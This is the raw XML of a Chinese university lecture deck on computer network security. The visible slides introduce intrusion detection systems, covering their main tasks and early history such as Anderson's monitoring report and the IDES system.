Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject23.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject3.bin"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject7.bin"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject14.bin"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject19.bin"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject22.bin"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject27.bin"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject2.bin"/><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6.webp"/><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image" Target="../media/image61.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject31.bin"/></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oleObject" Target="../embeddings/oleObject38.bin"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject43.bin"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject51.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide62.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject46.bin"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject59.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject33.bin"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject37.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject42.bin"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject50.bin"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject58.bin"/><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oleObject" Target="../embeddings/oleObject45.bin"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject54.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing3.vml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.wmf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject36.bin"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject49.bin"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject57.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject32.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject40.bin"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject48.bin"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject53.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject35.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject44.bin"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject56.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.wmf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject39.bin"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject47.bin"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject52.bin"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject55.bin"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject34.bin"/></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60.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78.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.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2.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject62.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject61.bin"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.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77.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide84.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23.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.wm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image" Target="../media/image77.emf"/><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8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81.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide85.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1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8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86.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87.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notesSlide" Target="../notesSlides/notesSlide87.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId9"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4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8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87.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29.xml"/><Relationship Id="rId7"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0.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9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89.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide90.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9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91.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2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9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2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag44.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag43.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide93.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slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag65.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag78.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tags" Target="../tags/tag73.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notesSlide" Target="../notesSlides/notesSlide93.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag52.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.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diagramLayout" Target="../diagrams/layout3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85.xml"/><Relationship Id="rId21" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing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diagramData" Target="../diagrams/data3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag84.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide94.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors3.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slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag92.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle3.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tags" Target="../tags/tag125.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag102.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag120.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tags" Target="../tags/tag124.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29"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tags" Target="../tags/tag123.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28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag127.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag109.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag118.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.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 Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag126.xml"/><Relationship Id="rId30"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6C3621-E526-49CC-BB13-CC1062550D80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机网络安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="副标题 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213A3107-2607-4E84-82AE-315E51BED04C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>华中科技大学</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2432843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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="720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IDS</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的主要任务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4058920" y="2193925"/>
            <a:ext cx="6602730" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10398" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="907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监视、分析用户及系统的活动</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14" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="15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19" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4060190" y="2743835"/>
            <a:ext cx="7280910" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11466" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20"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跟踪、分析网络数据流量</a:t>
              </a:r>
              <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4084320" y="3282315"/>
            <a:ext cx="7280910" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11466" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25"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实现数据文件的完整性检查</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3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4097020" y="3820795"/>
            <a:ext cx="7031990" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11074" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="975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构建已知攻击特征库，识别已知攻击</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31" name="组合 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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4</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4109720" y="4370705"/>
            <a:ext cx="6663690" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10494" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="917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构建正常行为模式，识别异常行为</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36" name="组合 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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9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5</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="图片 98" descr="NetworkVulnerability.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1786890" y="2524760"/>
            <a:ext cx="1973580" cy="2686685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E25413-0B7C-4094-A340-61AAA0B08F45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、入侵检测系统概述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432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入侵检测的开山之作 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657410" y="2165985"/>
            <a:ext cx="768369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2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>《Computer Security Threat Monitoring and Surveillance》</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4060190" y="3521075"/>
            <a:ext cx="7280910" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11466" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20"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第一次详细阐述了入侵检测的概念</a:t>
              </a:r>
              <a:endPar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24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4084320" y="4059555"/>
            <a:ext cx="7280910" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11466" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25"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将安全威胁分类：内部、外部和不法行为</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4097020" y="4598035"/>
            <a:ext cx="7031990" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11074" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="975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利用审计数据监视入侵活动</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31" name="组合 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="组合 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1309053" y="3042285"/>
            <a:ext cx="1972310" cy="2639060"/>
            <a:chOff x="1331" y="3639"/>
            <a:chExt cx="4370" cy="5660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="图片 9"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1517" y="3949"/>
              <a:ext cx="4184" cy="5350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>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5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1331" y="3639"/>
              <a:ext cx="4109" cy="5349"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7758752" y="2797175"/>
            <a:ext cx="337025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2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——James P. Aderson</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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0AC1E5E-6CF8-43C4-BE9A-FAB7A47D35E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发展简史</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540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IDES</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（入侵检测专家系统）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733471" y="2367573"/>
            <a:ext cx="670496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2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>美国乔治敦大学研究出的实时入侵检测系统模型</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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4608170" y="3131325"/>
            <a:ext cx="2651760" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="4176" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="285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统计学原理</a:t>
              </a:r>
              <a:endPar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24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4616477" y="3766807"/>
            <a:ext cx="2355215" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="3709" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="2390"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基于规则</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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078953" y="2262292"/>
            <a:ext cx="3451429" cy="3314286"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714238" y="4771525"/>
            <a:ext cx="619252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入侵检测中最有影响的一个系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2718C4-ED3E-4520-A042-384B37923ECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
